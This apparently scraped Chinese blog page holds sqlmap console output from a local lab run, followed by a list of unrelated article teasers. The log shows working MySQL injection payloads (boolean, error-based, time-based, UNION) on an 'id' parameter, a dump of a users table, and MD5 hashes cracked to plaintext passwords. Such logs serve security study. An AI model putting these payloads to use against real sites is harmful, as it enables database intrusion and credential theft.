|___|_  [']_|_|_|__,|  _||_|V...       |_|   http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 17:20:55 /2024-01-28/[17:20:56] [INFO] resuming back-end DBMS 'mysql'
[17:20:56] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: id=46 AND 3601=3601Type: error-basedTitle: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)Payload: id=46 AND (SELECT 1384 FROM(SELECT COUNT(*),CONCAT(0x7178717a71,(SELECT (ELT(1384=1384,1))),0x716b766a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: id=46 AND (SELECT 7504 FROM (SELECT(SLEEP(5)))YKbR)Type: UNION queryTitle: Generic UNION query (NULL) - 15 columnsPayload: id=-2063 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178717a71,0x694446736c5547555050536a4d6f467048454c56556858664a7277796b49534e5372627667587061,0x716b766a71),NULL,NULL,NULL,NULL-- -
---
[17:20:58] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
[17:20:58] [INFO] fetching entries of column(s) 'password,username' for table 'news_users' in database 'news'
[17:21:05] [WARNING] the SQL query provided does not return any output
[17:21:05] [INFO] resumed: 'e10adc3949ba59abbe56e057f20f883e'
[17:21:05] [INFO] resumed: 'admin'
[17:21:05] [INFO] resumed: 'e10adc3949ba59abbe56e057f20f883e'
[17:21:05] [INFO] resumed: '我是李四'
[17:21:05] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[17:21:13] [INFO] writing hashes to a temporary file 'c:\users\mzfait~1\appdata\local\temp\sqlmap9ektlv2308\sqlmaphashes-zlpi7u.txt'
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[17:21:17] [INFO] using hash method 'md5_generic_passwd'
[17:21:17] [INFO] resuming password '123456' for hash 'e10adc3949ba59abbe56e057f20f883e' for user 'admin'
Database: news
Table: news_users
[2 entries]
+----------+-------------------------------------------+
| username | password                                  |
+----------+-------------------------------------------+
| admin    | e10adc3949ba59abbe56e057f20f883e (123456) |
| 我是李四 | e10adc3949ba59abbe56e057f20f883e (123456) |
+----------+-------------------------------------------+[17:21:17] [INFO] table 'news.news_users' dumped to CSV file 'C:\Users\MZFAITHDREAM\AppData\Local\sqlmap\output\127.0.0.1\dump\news\news_users.csv'
[17:21:17] [INFO] fetched data logged to text files under 'C:\Users\MZFAITHDREAM\AppData\Local\sqlmap\output\127.0.0.1'
[17:21:17] [WARNING] your sqlmap version is outdated[*] ending @ 17:21:17 /2024-01-28/D:\sqlmap>

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/247242.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Kafka-服务端-GroupMetadataManager

GroupMetadataManager是GroupCoordinator中负责管理Consumer Group元数据以及其对应offset信息的组件。 GroupMetadataManager底层使用Offsets Topic,以消息的形式存储Consumer Group的GroupMetadata信息以及其消费的每个分区的offset,如图所示。 consumer_offsets的某Partiti…

C#算法(11)—求三个点构成圆的圆心坐标和半径

前言 我们在上位机开发领域也经常会碰到根据三个点求出圆的圆心、半径等信息的场景,本文就是详细的介绍如何根据三个点使用C#代码求出三点构成的圆的圆心坐标、圆半径、三点构成的圆弧的角度。 1、3点求圆分析 A、B、C三个点都是圆上的坐标点,过向量AB做中垂线,过向量AC做…

RabbitMQ“延时队列“

1.RabbitMQ"延时队列" 延迟队列存储的对象是对应的延迟消息&#xff0c;所谓“延迟消息”是指当消息被发送以后&#xff0c;并不想让消费者立刻拿到消息&#xff0c;而是等待特定时间后&#xff0c;消费者才能拿到这个消息进行消费 注意RabbitMQ并没有延时队列慨念,…

一款相对比较强大的国产ARM单片机HC32F4A0

已经用了3年的HC32F4A0&#xff0c;已经对它比较熟悉了&#xff0c;与STM32相比它的外设使用这些的确是挺大大&#xff0c;不像GD32一类的单片机很多都能兼容STM32。用久了之后就更喜欢用HC32F4A0&#xff0c;功能强大&#xff0c;外设使用灵活&#xff0c;用点向FPGA靠拢的感觉…

TCP 三次握手 四次挥手以及滑动窗口

TCP 三次握手 简介&#xff1a; TCP 是一种面向连接的单播协议&#xff0c;在发送数据前&#xff0c;通信双方必须在彼此间建立一条连接。所谓的 “ 连接” &#xff0c;其实是客户端和服务器的内存里保存的一份关于对方的信息&#xff0c;如 IP 地址、端口号等。 TCP 可以…

系统调用:计算机中的“服务员”

一、什么是系统调用 想象一下&#xff0c;你在一家餐厅就餐&#xff0c;你需要通过服务员来点菜、支付等。系统调用就像是这个服务员&#xff0c;它在软件和操作系统之间起到了桥梁的作用。当软件需要操作系统提供的某项服务时&#xff0c;它就像顾客一样&#xff0c;通过点菜…

双非本科准备秋招(9.2)——力扣哈希

1、383. 赎金信 跟昨天的题大同小异&#xff0c;因为只有26个字母&#xff0c;所以可以建个有26个坑位的数组。 做完昨天的题目&#xff0c;这个题没啥新意。 class Solution {public boolean canConstruct(String ransomNote, String magazine) {int[] hashTable new int[…

Gin 应用多实例部署session问题、session参数与刷新

文章目录 一、Gin Session 存储的实现方案二、memstore&#xff1a;基于内存的实现2.1 基本使用2.2 关键参数 三、使用redis&#xff1a;多实例部署3.1 使用redis优势3.2 基本使用 四、信息安全的三个核心概念五、Gin Session 参数5.1 参数介绍 六、Session 自动刷新 一、Gin S…

FFMPEG解析ts流

三篇相关联的文章&#xff1a; ffmpeg下HLS解析过程-CSDN博客TS文件格式详解及解封装过程-CSDN博客 FFMPEG解析ts流-CSDN博客 一、简介 关于TS格式解析&#xff0c;可以参考《TS文件格式详解及解封装过程-CSDN博客》&#xff0c;本文主要代码部分解读。建议大家熟读iso138…

Apache Shiro <= 1.2.4反序列化漏洞攻击 CVE-2016-4437 已亲自复现

Apache Shiro < 1.2.4反序列化漏洞攻击 CVE-2016-4437 已亲自复现 漏洞名称漏洞描述影响版本 漏洞复现环境搭建漏洞利用 修复建议总结 漏洞名称 漏洞描述 在 1.2.5 之前的 Apache Shiro 中&#xff0c;当未为“记住我”功能配置密钥时&#xff0c;远程攻击者可以通过未指定…

聚醚醚酮(Polyether Ether Ketone)PEEK在粘接使用时可以使用UV胶水吗?要注意哪些事项?

一般情况下&#xff0c;聚醚醚酮&#xff08;Polyether Ether Ketone&#xff0c;PEEK&#xff09;是一种难以黏附的高性能工程塑料&#xff0c;而UV胶水通常不是与PEEK进行粘接的首选方法。PEEK表面的化学性质和高温性能使得它对常规胶水的附着性较低。然而&#xff0c;有一些…

vscode copilot怎么去掉提示代码(ghost text or incline completion)

原因&#xff1a;最近在刷题&#xff0c;被这个提示烦死了&#xff0c;记录一下怎么关掉&#xff0c;防止将来需要开启找不到了XD. 1.直接ctrlshiftp召唤设置 2.输入preferences: open usr settings找到如图第一个 3.去掉这个方框的勾选 ps直接在extension里disable不行呢 不…

DOM 型 XSS 攻击演示(附链接)

一、介绍 DOM&#xff08;Document Object Model&#xff09;型 XSS&#xff08;Cross-Site Scripting&#xff09;攻击是一种 Web 应用程序中的安全漏洞&#xff0c;其特点是攻击者成功地注入了恶意脚本&#xff0c;这些脚本在用户的浏览器中执行&#xff0c;从而导致恶意行为…

顺序表和链表【数据结构】【基于C语言实现】【一站式速通】

目录 顺序表 顺序表的优点 顺序表的实现 1.结构体的定义 2.初始化数组 3.插入数据 4.其余接口函数的实现 5.释放内存 顺序表的缺陷 单向链表 单向链表的优点 单向链表的实现 1.链表的定义 2.链表的初始化 3.其余接口函数的实现 5.释放内存 单向链表的缺陷 双…

ELK日志解决方案

ELK日志解决方案 ELK套件日志系统应该是Elasticsearch使用最广泛的场景之一了&#xff0c;Elasticsearch支持海量数据的存储和查询&#xff0c;特别适合日志搜索场景。广泛使用的ELK套件(Elasticsearch、Logstash、Kibana)是日志系统最经典的案例&#xff0c;使用Logstash和Be…

CVPR——Latex模版下载

CVPR官网 -> AuthorGuidelines 链接&#xff1a;AuthorGuidelines

怎么把几百M大小的视频做成二维码?扫码播放视频在线教程

怎么把几百M大小的视频做成一个二维码展示呢&#xff1f;通过二维码来作为视频的载体是现在很常用的一种手段&#xff0c;通过这种方式不仅成本比较低&#xff0c;而且传播速度也比较快&#xff0c;通过访问云端数据就可以播放视频。 视频二维码生成的方法一般会通过二维码生成…

微信小程序(二十)Vant组件库的配置

教程很详细&#xff0c;直接上过程 上一篇 官方文档也有&#xff0c;但是因为版本的更新&#xff0c;官方文档并没有跟着改变&#xff0c;这里我写一份最新版能用的教程 &#xff08;口头禅还是不能少的&#x1f923;&#x1f923;&#x1f923;&#xff09; 灵魂拷问&#xf…

【RT-DETR有效改进】反向残差块网络EMO | 一种轻量级的CNN架构(轻量化网络,参数量下降约700W)

👑欢迎大家订阅本专栏,一起学习RT-DETR👑 一、本文介绍 本文给大家带来的改进机制是反向残差块网络EMO,其的构成块iRMB在之前我已经发过了,同时进行了二次创新,本文的网络就是由iRMB组成的网络EMO,所以我们二次创新之后的iEMA也可以用于这个网络中,再次形成二次…

Kotlin快速入门5

Kotlin的继承与重写 kotlin的继承 Kotlin中所有类都继承自Any类&#xff0c;Any类是所有类的超类&#xff0c;对于没有超类型声明的类是默认超类&#xff08;Any 不是 java.lang.Object&#xff09;&#xff1a; class LearnKotlin // 默认继承自Any Any类默认提供三个函数…